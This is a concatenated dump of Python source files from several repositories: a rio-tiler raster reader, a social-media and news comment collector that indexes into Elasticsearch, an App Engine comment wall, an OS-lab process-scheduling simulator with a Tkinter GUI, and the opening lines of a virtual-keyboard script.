src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
return dict(address=address, bounds=bounds)
def metadata(
address: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return image statistics.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
with rasterio.open(address) as src_dst:
meta = reader.metadata(
src_dst, percentiles=(pmin, pmax), hist_options=hist_options, **kwargs
)
return dict(address=address, **meta)
def info(address: str) -> Dict:
"""
Return simple metadata about the file.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
Returns
-------
out : dict.
"""
with rasterio.open(address) as src_dst:
minzoom, maxzoom = get_zooms(src_dst)
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2, minzoom]
def _get_descr(ix):
"""Return band description."""
name = src_dst.descriptions[ix - 1]
if not name:
name = "band{}".format(ix)
return name
band_descriptions = [(ix, _get_descr(ix)) for ix in src_dst.indexes]
tags = [(ix, src_dst.tags(ix)) for ix in src_dst.indexes]
other_meta = dict()
if src_dst.scales[0] and src_dst.offsets[0]:
other_meta.update(dict(scale=src_dst.scales[0]))
other_meta.update(dict(offset=src_dst.offsets[0]))
if has_alpha_band(src_dst):
nodata_type = "Alpha"
elif has_mask_band(src_dst):
nodata_type = "Mask"
elif src_dst.nodata is not None:
nodata_type = "Nodata"
else:
nodata_type = "None"
try:
cmap = src_dst.colormap(1)
other_meta.update(dict(colormap=cmap))
except ValueError:
pass
return dict(
address=address,
bounds=bounds,
center=center,
minzoom=minzoom,
maxzoom=maxzoom,
band_metadata=tags,
band_descriptions=band_descriptions,
dtype=src_dst.meta["dtype"],
colorinterp=[src_dst.colorinterp[ix - 1].name for ix in src_dst.indexes],
nodata_type=nodata_type,
**other_meta,
)
def tile(
address: str,
tile_x: int,
tile_y: int,
tile_z: int,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
    Create mercator tile from any image.
Attributes
----------
address : str
file url.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
return reader.tile(src_dst, tile_x, tile_y, tile_z, tilesize, **kwargs)
def preview(address: str, **kwargs: Any) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Return small version of a raster.
Attributes
----------
address: str
file url.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.preview' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
return reader.preview(src_dst, **kwargs)
def point(address: str, lon: float, lat: float, **kwargs: Any) -> List:
"""
Read point value from a file.
Attributes
----------
address: str
file url.
    lon: float
        Longitude.
    lat: float
        Latitude.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.point' function.
Returns
-------
point: list
List of pixel values per bands indexes.
"""
with rasterio.open(address) as src_dst:
return reader.point(src_dst, (lon, lat), **kwargs)
def area(
address: str,
bbox: Tuple[float, float, float, float],
dst_crs: Optional[CRS] = None,
bounds_crs: CRS = constants.WGS84_CRS,
max_size: int = 1024,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Read value from a bbox.
Attributes
----------
address: str
file url.
bbox: tuple
bounds to read (left, bottom, right, top) in "bounds_crs".
dst_crs: CRS or str, optional
Target coordinate reference system, default is the dataset CRS.
bounds_crs: CRS or str, optional
bounds coordinate reference system, default is "epsg:4326"
max_size: int, optional
Limit output size array, default is 1024.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.part' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
if not dst_crs:
dst_crs = src_dst.crs
return reader.part(
src_dst,
bbox,
max_size=max_size,
bounds_crs=bounds_crs,
dst_crs=dst_crs,
**kwargs,
)
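# Illustrative usage sketch (not part of the original module): read a mercator
# tile from a local COG. Path and tile indexes mirror tests/test_io_cogeo.py.
if __name__ == "__main__":
    src = "tests/fixtures/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif"
    data, mask = tile(src, 438217, 801835, 21)
    print(data.shape, mask.all())  # expected: (3, 256, 256) True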
|
Xepp/magpie
|
app/process/instagram_comment_process.py
|
<reponame>Xepp/magpie
import os
import time
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.adapter.instagram import InstagramWebAdapter
from app.util.enumeration import SourceType
from app.util.helper import normalize_text
class InstagramCommentProcess:
def __init__(self):
self.ig_adapter = InstagramWebAdapter()
self.es_adapter = ElasticsearchAdapter()
def run(self, shortcode):
end_cursor = None
has_more = True
while has_more:
try:
print(f'End Cursor: {end_cursor}')
comments, end_cursor, has_more = self.ig_adapter.get_media_comments(
shortcode=shortcode,
end_cursor=end_cursor
)
for comment in comments:
comment_id = comment.get('id')
text = comment.get('text')
content = normalize_text(text)
elastic_id = f'instagram://{shortcode}/{comment_id}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.INSTAGRAM.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
except Exception as exc:
if "HTTPError" not in str(exc):
raise exc
print(f'Sleeping for 60 sec. {exc}')
time.sleep(60)
|
Xepp/magpie
|
app/util/helper.py
|
<reponame>Xepp/magpie<filename>app/util/helper.py
import re
import string
import random
def get_tweet_type(tweet):
if 'retweeted_status' in tweet:
return 'retweet'
elif 'quoted_status' in tweet:
return 'quote'
elif tweet.get('in_reply_to_status_id') is not None:
return 'reply'
return 'tweet'
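# Worked example (comments only):
#   get_tweet_type({'retweeted_status': {}})       -> 'retweet'
#   get_tweet_type({'in_reply_to_status_id': 123}) -> 'reply'
#   get_tweet_type({'text': 'plain status'})       -> 'tweet'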
def get_news_id(url):
try:
id = re.findall('detail/(.+)/', url)[0]
except Exception:
id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
return id
def normalize_text(text):
return re.sub(r"(?:\@|https?\://)\S+", "", text).strip()
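# Worked example (comments only): mentions and links are stripped, then the
# result is trimmed.
#   normalize_text('hello @someone')                  -> 'hello'
#   normalize_text('https://example.com/x nice read') -> 'nice read'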
|
Xepp/magpie
|
app/adapter/twitter.py
|
<gh_stars>0
import os
from tweepy import StreamListener
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.util.enumeration import SourceType
from app.util.helper import get_tweet_type
from app.util.helper import normalize_text
class TwitterStreamListener(StreamListener):
def __init__(self):
super().__init__()
self.es_adapter = ElasticsearchAdapter()
def on_status(self, status):
tweet = getattr(status, '_json')
tweet_type = get_tweet_type(tweet)
if tweet_type in ['tweet', 'reply']:
text = tweet.get('extended_tweet', {}).get('full_text', tweet.get('text', ''))
content = normalize_text(text)
tweet_id = tweet.get('id')
elastic_id = f'twitter://{tweet_id}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.TWITTER.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
|
Xepp/magpie
|
app/vo/__init__.py
|
<reponame>Xepp/magpie
from app.vo.elasticsearch import ElasticsearchDocVO
__all__ = [
ElasticsearchDocVO
]
|
Xepp/magpie
|
app/adapter/web.py
|
<reponame>Xepp/magpie
import re
import requests
from bs4 import BeautifulSoup
class KhabarFooriAdapter:
def parse_comment(self, tag):
head = tag.find('div', { 'class': 'head' })
body = tag.find('div', { 'class': 'body' })
author = head.find('span', { 'class': 'pull-right' }).text
info = head.find_all('span', { 'class': 'pull-left' })
text = body.p.text
date = re.sub('-', '', info[-1].text)
date = re.sub('\n', '', date)
date = re.sub(' +', ' ', date)
pos = info[0].text if len(info) == 4 else '-'
neg = info[1].text if len(info) == 4 else '-'
return {
'author': author,
'date': date,
'text': text,
'pos': pos,
'neg': neg,
            'replies': []
}
def get_page_comments(self, url):
content = requests.get(url)
soup = BeautifulSoup(content.text, 'html.parser')
result = []
comments = soup.find('div', { 'class': 'comments-content' })
rows = comments.find_all('div', { 'class': 'comment' })
for row in rows:
if 'comment-replay' in row.attrs['class']:
continue
comment = self.parse_comment(row)
            replies = row.find_all('div', { 'class': 'comment-replay' })
            for reply in replies:
                comment['replies'].append(self.parse_comment(reply))
result.append(comment)
return result
|
Xepp/magpie
|
app/process/web_comment_process.py
|
import os
import time
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.adapter.web import KhabarFooriAdapter
from app.util.enumeration import SourceType
from app.util.helper import get_news_id
class KhabarFooriCommentProcess:
def __init__(self):
self.web_adapter = KhabarFooriAdapter()
self.es_adapter = ElasticsearchAdapter()
def run(self, url):
comments = self.web_adapter.get_page_comments(url)
news_id = get_news_id(url)
for comment in comments:
author = comment.get('author')
date = comment.get('date')
content = comment.get('text')
elastic_id = f'web://{news_id}/{author}/{date}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.WEB.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
|
Xepp/magpie
|
app/util/enumeration.py
|
from enum import Enum
class BaseEnum(Enum):
@classmethod
def list(cls):
return list(map(lambda c: c.value, cls))
class SentimentType(BaseEnum):
POS = 'pos'
NEG = 'neg'
NEU = 'neu'
UNK = 'unk'
class SourceType(BaseEnum):
TWITTER = 'twitter'
INSTAGRAM = 'instagram'
WEB = 'web'
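# Example: BaseEnum.list() returns the raw values in declaration order, e.g.
# SourceType.list() -> ['twitter', 'instagram', 'web']
# SentimentType.list() -> ['pos', 'neg', 'neu', 'unk']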
|
Xepp/magpie
|
app/adapter/elasticsearch.py
|
from datetime import datetime
from elasticsearch import Elasticsearch
from app.vo import ElasticsearchDocVO
from app.util.enumeration import SentimentType
class ElasticsearchAdapter:
def __init__(self):
self.es = Elasticsearch()
def insert_doc(self, index, elastic_id, source, content):
doc = {
ElasticsearchDocVO.TIMESTAMP: datetime.now(),
ElasticsearchDocVO.UPDATED_AT: datetime.now(),
ElasticsearchDocVO.SOURCE: source,
ElasticsearchDocVO.CONTENT: content,
ElasticsearchDocVO.TOPICS: [],
ElasticsearchDocVO.SENTIMENT: SentimentType.UNK.value
}
return self.es.create(
index=index,
id=elastic_id,
body=doc
)
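# Hedged usage sketch; a reachable Elasticsearch node is assumed, and the
# index name and document id below are illustrative:
if __name__ == '__main__':
    adapter = ElasticsearchAdapter()
    res = adapter.insert_doc(
        index='magpie',                       # hypothetical index name
        elastic_id='web://example/author/1',  # hypothetical id
        source='web',
        content='sample content',
    )
    print(res.get('result'))  # 'created' on first insert; create() raises on duplicate ids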
|
Xepp/magpie
|
manage.py
|
import os
from dotenv import load_dotenv
from argparse import ArgumentParser
from app.util.enumeration import SourceType
from app.process.twitter_stream_process import TwitterStreamProcess
from app.process.instagram_comment_process import InstagramCommentProcess
from app.process.web_comment_process import KhabarFooriCommentProcess
def run_web_comment(args):
url = args.url
process = KhabarFooriCommentProcess()
process.run(url)
def run_twitter_stream(args):
twitter_consumer_key = os.getenv('TWITTER_CONSUMER_KEY')
twitter_consumer_secret = os.getenv('TWITTER_CONSUMER_SECRET')
twitter_access_token = os.getenv('TWITTER_ACCESS_TOKEN')
twitter_access_token_secret = os.getenv('TWITTER_ACCESS_TOKEN_SECRET')
process = TwitterStreamProcess(
consumer_key=twitter_consumer_key,
consumer_secret=twitter_consumer_secret,
access_token=twitter_access_token,
access_token_secret=twitter_access_token_secret
)
process.run()
def run_instagram_comment(args):
shortcode = args.shortcode
process = InstagramCommentProcess()
process.run(shortcode)
if __name__ == '__main__':
load_dotenv()
parser = ArgumentParser()
subparsers = parser.add_subparsers(dest='source')
parser_twitter = subparsers.add_parser('twitter')
parser_twitter.set_defaults(func=run_twitter_stream)
parser_instagram = subparsers.add_parser('instagram')
parser_instagram.add_argument(
'-s',
'--shortcode',
required=True,
help='instagram media shortcode'
)
parser_instagram.set_defaults(func=run_instagram_comment)
parser_web = subparsers.add_parser('web')
parser_web.add_argument(
'-u',
'--url',
required=True,
help='web (Khabar Foori) url'
)
parser_web.set_defaults(func=run_web_comment)
args = parser.parse_args()
args.func(args)
|
Xepp/magpie
|
app/adapter/instagram.py
|
<reponame>Xepp/magpie<gh_stars>0
import hashlib
import string
import random
from instagram_web_api import Client
class InstagramWebClient(Client):
@staticmethod
def _extract_rhx_gis(html):
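        # Workaround: Instagram removed rhx_gis from the page's shared data,
        # but the instagram_web_api client still derives a signature from it;
        # the server no longer appears to validate it, so a random md5 suffices.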
options = string.ascii_lowercase + string.digits
text = ''.join([random.choice(options) for _ in range(8)])
return hashlib.md5(text.encode()).hexdigest()
class InstagramWebAdapter:
def __init__(self):
self.api = InstagramWebClient(
auto_patch=False,
drop_incompat_keys=False
)
def get_media_comments(self, shortcode, end_cursor=None, count=50):
items = list()
feed = self.api.media_comments(
short_code=shortcode,
end_cursor=end_cursor,
count=count,
extract=False
)
if not feed.get('status') == 'ok':
raise Exception('status not ok')
result = feed.get('data', {}).get('shortcode_media', {}).get('edge_media_to_comment', {})
new_end_cursor = result.get('page_info', {}).get('end_cursor')
has_next_page = result.get('page_info', {}).get('has_next_page', False)
edges = result.get('edges', [])
edges = [edge.get('node') for edge in edges]
items.extend(reversed(edges))
return items, new_end_cursor, has_next_page
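# Hedged usage sketch: follow end_cursor until has_next_page is False.
# 'B_example' is a placeholder shortcode, and network access is assumed.
if __name__ == '__main__':
    adapter = InstagramWebAdapter()
    comments, cursor, more = adapter.get_media_comments('B_example')
    while more:
        batch, cursor, more = adapter.get_media_comments('B_example', end_cursor=cursor)
        comments.extend(batch)
    print(len(comments), 'comments fetched')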
|
Xepp/magpie
|
app/process/twitter_stream_process.py
|
from tweepy import OAuthHandler
from tweepy import Stream
from app.adapter.twitter import TwitterStreamListener
class TwitterStreamProcess:
def __init__(self, consumer_key, consumer_secret, access_token, access_token_secret):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.access_token = access_token
self.access_token_secret = access_token_secret
def _get_oauth_handler(self):
auth = OAuthHandler(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_secret
)
auth.set_access_token(
key=self.access_token,
secret=self.access_token_secret
)
return auth
@staticmethod
def _get_track_list():
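        # High-frequency Persian function words: tracking these matches
        # virtually every Persian-language tweet in the stream.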
_track = [
'از',
'به',
'با',
'چرا',
'که',
'هم',
'یه',
'این',
'تو'
]
return _track or None
@staticmethod
def _get_language_list():
_languages = [
'fa'
]
return _languages or None
def run(self):
stream_listener = TwitterStreamListener()
auth = self._get_oauth_handler()
stream = Stream(
auth=auth,
listener=stream_listener,
tweet_mode='extended'
)
track = self._get_track_list()
languages = self._get_language_list()
stream.filter(
track=track,
languages=languages
)
|
mc3273/allow-comments-on-your-page
|
notes.py
|
<gh_stars>0
# Import libraries
import urllib
import os
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.datastore.datastore_query import Cursor
import webapp2
import jinja2
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir), autoescape=True)
# Defines the HTML Templates
class Handler(webapp2.RequestHandler):
def render(self, template, **kw):
self.write(self.render_str(template,**kw))
def render_str(self, template, **params):
template = jinja_env.get_template(template)
return template.render(params)
def write(self, *a, **kw):
self.response.write(*a, **kw)
# Comments Wall
DEFAULT_WALL = 'Comments'
def wall_key(wall_name=DEFAULT_WALL):
return ndb.Key('Wall', wall_name)
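# Keying every Post under a shared Wall ancestor makes the post_list query
# strongly consistent in the App Engine datastore.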
# Post Variables
class Author(ndb.Model):
identity = ndb.StringProperty(indexed=True)
name = ndb.StringProperty(indexed=False)
email = ndb.StringProperty(indexed=False)
class Post(ndb.Model):
author = ndb.StructuredProperty(Author)
content = ndb.StringProperty(indexed=False)
date = ndb.DateTimeProperty(auto_now_add=True)
# Define Main Page
class MainPage(Handler):
def get(self):
wall_name = self.request.get('wall_name',DEFAULT_WALL)
if wall_name == DEFAULT_WALL.lower(): wall_name = DEFAULT_WALL
posts_to_fetch = 10
cursor_url = self.request.get('continue_posts')
arguments = {'wall_name': wall_name}
posts_query = Post.query(ancestor = wall_key(wall_name)).order(-Post.date)
posts, cursor, more = posts_query.fetch_page(posts_to_fetch, start_cursor =
Cursor(urlsafe=cursor_url))
if more:
arguments['continue_posts'] = cursor.urlsafe()
arguments['posts'] = posts
user = 'Anonymous'
arguments['user_name'] = user
self.render('posts.html', **arguments)
# Define Post your Comment
class PostWall(webapp2.RequestHandler):
def post(self):
wall_name = self.request.get('wall_name',DEFAULT_WALL)
post = Post(parent=wall_key(wall_name))
content = self.request.get('content')
        if not isinstance(content, unicode):
            post.content = unicode(content, 'utf-8')
        else:
            post.content = content
post.put()
query_params = {'wall_name': wall_name}
self.redirect('/?' + urllib.urlencode(query_params))
app = webapp2.WSGIApplication([
('/', MainPage),
('/sign', PostWall),
], debug=True)
|
userElaina/oslab
|
cui1.py
|
import os
import random
rd=lambda x:(random.choice(list(range(100)))<x)
s_time=[2,4,8,16,999999]
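# Multilevel feedback queues: s_time[i] is the time quantum of level i; the
# quantum doubles per level and the last level is effectively FCFS.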
_q=[list() for _ in s_time]  # one independent queue per level; [list()]*n would alias a single list
NT='NEXIST'
RD='READY'
RUN='RUNNING'
IO='WAITING'
END='DONE'
BG='begin'
_process_example={
'name':'EXIT',
'id':0,
'total':0,
'wait':0,
'err':0,
'+io':0,
'-io':50,
'surplus':0,
'state':END,
}
def process_maker()->list:
_process=list()
for i in range(5):
_a={
'name':'p'+str(i+1),
'id':100+i+1,
'total':20,
'+io':40,
'-io':10,
}
_process.append(_a)
for i in range(5,10):
_a={
'name':'p'+str(i+1),
'id':200+i+1,
'total':10,
'wait':(i+1)*10,
}
_process.append(_a)
for i in range(10,15):
_a={
'name':'p'+str(i+1),
'id':300+i+1,
'total':40,
'err':3,
}
_process.append(_a)
return _process
def u(js:dict,k:str,v:all,t:type=int)->None:
if k not in js:
js[k]=v
js[k]=t(js[k])
_l=process_maker()
for i in _l:
i['state']=NT
u(i,'surplus',i['total'])
u(i,'total',20)
u(i,'wait',0)
u(i,'err',0)
u(i,'+io',0)
u(i,'-io',50)
if i['wait']:
continue
i['state']=0
_q[0].append(i)
def chose():
for i in _q:
if i:
return i.pop(0)
def fil(l:list,x:int=8)->str:
return ''.join([str(i)+' '*(x-len(str(i))) for i in l])
def bg()->None:
l=['Clock','Queue','CPU','NewIO?']+[i['name'] for i in _l]
print(fil(l))
def ckio(p:dict):
for i in _l:
if i==p:
continue
if i['state']==IO:
if rd(i['-io']):
i['state']=0
# print('push',i)
_q[0].append(i)
_clk=1
def clk(p:dict=None,lv:int=0):
global _clk
if p:
if rd(p['+io']):
p['state']=IO
if p['surplus']==1 or rd(p['err']):
p['state']=END
l=[_clk,lv,p['name']+'_'+str(p['total']-p['surplus']+1),'True' if p['state']==IO else '']+[RUN if i==p else (RD if isinstance(i['state'],int) else i['state']) for i in _l]
else:
p=_process_example
l=[_clk,'','WAITING','']+[RD if isinstance(i['state'],int) else i['state'] for i in _l]
print(fil(l))
ckio(p)
for i in _l:
if i['wait']==_clk:
i['state']=0
_q[0].append(i)
p['surplus']-=1
_clk+=1
def run():
if not [None for i in _l if i['state']!=END]:
return
p=chose()
if not p:
clk()
return True
lv=p['state']
# print('pop',p)
for i in range(s_time[lv]):
if not isinstance(p['state'],int):
break
clk(p,lv)
if isinstance(p['state'],int):
p['state']+=1
# print('push',p)
_q[p['state']].append(p)
return True
bg()
while run(): pass
clk()
clk()
clk()
|
userElaina/oslab
|
gui3.py
|
<reponame>userElaina/oslab
import os
import random
import tkinter as tk
from time import sleep as slp
from copy import deepcopy as dcp
import downs
_lg='out1.csv'
rd=lambda x:(random.choice(list(range(100)))<abs(x))
open(_lg,'wb')
_other_1=False
_other_2=False
_other_3=False
_other_4=False
_other_5=True
_other_6=False
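# Scheduling-policy switches (cf. the window titles below): _other_1 FCFS,
# _other_2 SJF, _other_3 SRTN, _other_4 HRRN, _other_5 HPF, _other_6 RR;
# with all of them False the simulator runs the default multilevel feedback queue.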
if _other_2:
_key=lambda i:i['total']
if _other_3:
_key=lambda i:i['remain']
if _other_4:
_key=lambda i:1+(_clk-i['wait']+1)/i['total']
if _other_5:
_key=lambda i:i['other']
def pt(x:str):
print(x)
open(_lg,'a').write(str(x)+'\n')
def u(js:dict,k:str,v:all,t:type=int)->None:
if k not in js:
js[k]=v
js[k]=t(js[k])
def Fbt(
where,
px:int,
py:int,
x:int,
y:int,
command=None,
text:str='',
font:tuple=('黑体',12,),
bg:str='#ffffff',
abg:str=None,
bd=0,
):
if not abg:
abg=bg
fa=tk.Frame(
where,
width=px,
height=py,
bg=bg,
)
fa.propagate(False)
fa.place(x=x,y=y)
a=tk.Button(
fa,
command=command,
text=text,
font=font,
bg=bg,
bd=bd,
activebackground=abg,
)
a.pack(expand=True,fill=tk.BOTH)
return a
NT='NEXIST'
RD='READY'
RUN='RUNNING'
IO='WAITING'
END='DONE'
BG='background'
col={
BG:'#ffffff',
NT:'#ffffff',
RD:'#00ff00',
RUN:'#00ffff',
IO:'#ff0000',
END:'#7f7f7f',
}
_process_example={
'name':'EXIT',
'id':0,
'total':0,
'wait':0,
'err':0,
'other':0,
'+io':0,
'-io':50,
'remain':0,
'state':END,
}
def process_maker()->list:
_process=list()
for i in range(5):
_a={
'name':'p'+str(i+1),
'id':100+i+1,
'total':20,
'+io':40,
'-io':10,
}
_process.append(_a)
for i in range(5,10):
_a={
'name':'p'+str(i+1),
'id':200+i+1,
'total':10,
'wait':(i+1)*10,
}
_process.append(_a)
for i in range(10,15):
_a={
'name':'p'+str(i+1),
'id':300+i+1,
'total':40,
'err':3,
}
_process.append(_a)
return _process
_l=process_maker()
s_time=[2,4,8,16,99]
if _other_1 or _other_2 or _other_3 or _other_4 or _other_5:
s_time=[999999,999999,999999,999999,999999]
if _other_6:
s_time=[4,4,4,4,4,]
_q=[list() for i in s_time]
_len=len(_l)
dpix,dpiy=1440,900
psquare=50
pd=2
ptitle=25
_len_title=[100,150,150,150,160,200,100]
nx=(dpix-psquare*2)//(psquare+pd)
ny=(_len-1)//nx+1
t=tk.Tk()
t.geometry(str(dpix)+'x'+str(dpiy)+'+0+0')
if _other_1:
t.title('First Come First Serve')
elif _other_2:
t.title('Shortest Job First')
elif _other_3:
t.title('Shortest Remaining Time Next')
elif _other_4:
t.title('Highest Response Ratio Next')
elif _other_5:
t.title('Highest Possible Frequency')
elif _other_6:
t.title('Round Robin')
else:
t.title('Feed-Back')
# t.iconbitmap('1.png')
tt=tk.Frame(
t,
width=dpix,
height=dpiy,
bg=col[BG],
)
tt.place(x=0,y=0)
# tt.pack(expand=True,fill=tk.BOTH)
fbts=list()
bts=list()
bt_clk=None
bt_auto=None
bt_cpu=None
nwx,nwy=pd,pd
a=Fbt(
tt,
px=_len_title[0],
py=ptitle,
x=pd,
y=pd,
    text='All processes:',
bg=col[BG],
)
nwy+=ptitle+pd
for j in range(ny):
yy=nwy+(psquare+pd)*j
for i in range(nx):
n=j*nx+i
xx=nwx+(psquare+pd)*i
a=Fbt(
tt,
px=psquare,
py=psquare,
x=xx,
y=yy,
text=(_l[n]['name']+'\n'+str(_l[n]['total'])+'/'+str(_l[n]['total'])) if n<_len else '',
bg=col[NT] if n<_len else col[BG],
)
bts.append(a)
for k in range(len(s_time)+1):
nwx,nwy=pd,pd+(ptitle+pd+psquare+ptitle)*(k+1)
a=Fbt(
tt,
px=_len_title[k+1],
py=ptitle,
x=nwx,
y=nwy,
        text=('Waiting queue:')
        if k==len(s_time) else
        ('Process queue '+str(k+1)+':'),
bg=col[BG],
)
nwy+=ptitle+pd
for j in range(ny):
yy=nwy+(psquare+pd)*j
for i in range(nx):
xx=nwx+(psquare+pd)*i
a=Fbt(
tt,
px=psquare,
py=psquare,
x=xx,
y=yy,
text='',
bg=col[BG],
)
bts.append(a)
flg_wait=True
def f():
global flg_wait
flg_wait=False
def run():
if not [None for i in _l if i['state']!=END]:
clk()
return False
p=chose()
if not p:
clk()
return True
lv=p['state']
flg_ct=False
for i in range(s_time[lv]):
if not clk(p,lv):
flg_ct=True
break
if isinstance(p['state'],int):
if not flg_ct and not _other_6:
p['state']+=1
_q[p['state']].append(p)
return True
def th_1():
while True:
run()
flg_auto=False
def th_2():
while True:
slp(0.01)
if flg_auto:
f()
def h():
global flg_auto
if flg_auto:
bt_auto['bg']=col[IO]
bt_auto['activebackground']=col[RUN]
else:
bt_auto['bg']=col[RUN]
bt_auto['activebackground']=col[IO]
    flg_auto=not flg_auto
def bg():
l=['Clock','Queue','CPU','NewIO?']+[i['name'] for i in _l]
pt(fil(l))
for _i in range(_len):
i=_l[_i]
i['state']=NT
u(i,'remain',i['total'])
u(i,'total',20)
u(i,'wait',0)
u(i,'err',0)
u(i,'other',0)
u(i,'+io',0)
u(i,'-io',50)
if i['wait']!=0:
continue
i['state']=0
bts[_i]['bg']=col[RD if isinstance(i['state'],int) else i['state']]
bts[_i]['activebackground']=bts[_i]['bg']
bts[_i+nx]['bg']=bts[_i]['bg']
bts[_i+nx]['activebackground']=bts[_i]['bg']
bts[_i+nx]['text']=i['name']
_q[0].append(i)
downs.throws(th_1)
downs.throws(th_2)
bt_clk['text']='Clock'
bt_clk['command']=f
bt_auto['command']=h
bt_auto['text']='Auto'
bt_auto['bg']=col[IO]
bt_auto['activebackground']=col[RD]
def chose():
for i in _q:
if i:
return i.pop(0)
def fil(l:list,x:int=8)->str:
return ','.join([str(i)+' '*(x-1-len(str(i))) for i in l])
def ckio(p:dict):
_ans=list()
for i in _l:
if i==p:
continue
if i['state']==IO:
if rd(i['-io']):
i['state']=0
_q[0].append(i)
_ans.append(i['name'])
return _ans
_clk=1
def clk(p:dict=None,lv:int=0):
global _clk,flg_wait
    while flg_wait: pass  # block until the Clock button (or auto mode) releases it
# print(clk)
if p:
if rd(p['+io']):
p['state']=IO
if p['remain']==1 or rd(p['err']):
p['state']=END
l=[
_clk,
lv,
p['name']+'_'+str(p['total']-p['remain']+1),
'True' if p['state']==IO else ''
]+[
RUN if i==p else (
RD if isinstance(i['state'],int) else i['state']
) for i in _l
]
bt_cpu['text']=p['name']
bt_cpu['bg']=col[RUN]
bt_cpu['activebackground']=col[RUN]
else:
p=_process_example
l=[_clk,'','WAITING','']+[
RD if isinstance(i['state'],int) else i['state']
for i in _l
]
bt_cpu['text']='WAIT\nING'
bt_cpu['bg']=col[END]
bt_cpu['activebackground']=col[END]
pt(fil(l))
for _i in range(_len):
i=_l[_i]
bts[_i]['bg']=col[RUN if i==p else (
RD if isinstance(i['state'],int) else i['state']
)]
bts[_i]['activebackground']=bts[_i]['bg']
bts[_i]['text']=i['name']+'\n'+str(i['remain'])+'/'+str(i['total'])
for _i in range(len(_q)):
i=_q[_i]
for _j in range(nx):
_k=(_i+1)*nx+_j
if _j<len(i):
bts[_k]['text']=i[_j]['name']
bts[_k]['bg']=col[RD]
bts[_k]['activebackground']=col[RD]
else:
bts[_k]['text']=''
bts[_k]['bg']=col[BG]
bts[_k]['activebackground']=col[BG]
_waits=ckio(p)
for i in _l:
if i['state']!=NT:
continue
if i['wait']==_clk or (i['wait']<0 and rd(i['wait'])):
i['state']=0
_q[0].append(i)
if _other_2 or _other_3 or _other_4 or _other_5:
for i in _q:
i.sort(key=_key)
for _j in range(nx):
_k=(len(s_time)+1)*nx+_j
if _j<len(_waits):
bts[_k]['text']=_waits[_j]
bts[_k]['bg']=col[IO]
bts[_k]['activebackground']=col[IO]
else:
bts[_k]['text']=''
bts[_k]['bg']=col[BG]
bts[_k]['activebackground']=col[BG]
bt_tm['text']=str(_clk)
p['remain']-=1
flg_wait=True
_clk+=1
if not isinstance(p['state'],int):
return False
for i in range(p['state']):
if _q[i]:
return False
return True
bt_clk=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=psquare,
text='Begin',
bg=col[IO],
abg=col[RUN],
command=bg,
font=('黑体',12,''),
)
bt_auto=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=int(psquare*2.5),
text='',
bg=col[BG],
abg=col[BG],
)
Fbt(
tt,
px=psquare,
py=psquare//2,
x=dpix-int(psquare*1.5),
y=psquare*5,
text='CPU',
bg=col[BG],
abg=col[BG],
)
bt_cpu=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=pd+int(psquare*5.5),
text='WAIT\nING',
bg=col[END],
abg=col[END],
)
Fbt(
tt,
px=psquare,
py=psquare//2,
x=dpix-int(psquare*1.5),
y=psquare*7,
text='Clock',
bg=col[BG],
abg=col[BG],
)
bt_tm=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=pd+int(psquare*7.5),
text='0',
bg=col[RUN],
abg=col[RUN],
)
t.mainloop()
|
RishabhKT/Virtual-Keyboard-Using-Open-CV
|
virtual key.py
|
import cv2
from cvzone.HandTrackingModule import HandDetector
from time import sleep
import numpy as np
import cvzone
from pynput.keyboard import Key,Controller
cap = cv2.VideoCapture(0)
cap.set(3, 1280)
cap.set(4, 720)
detector = HandDetector(detectionCon=0.8)
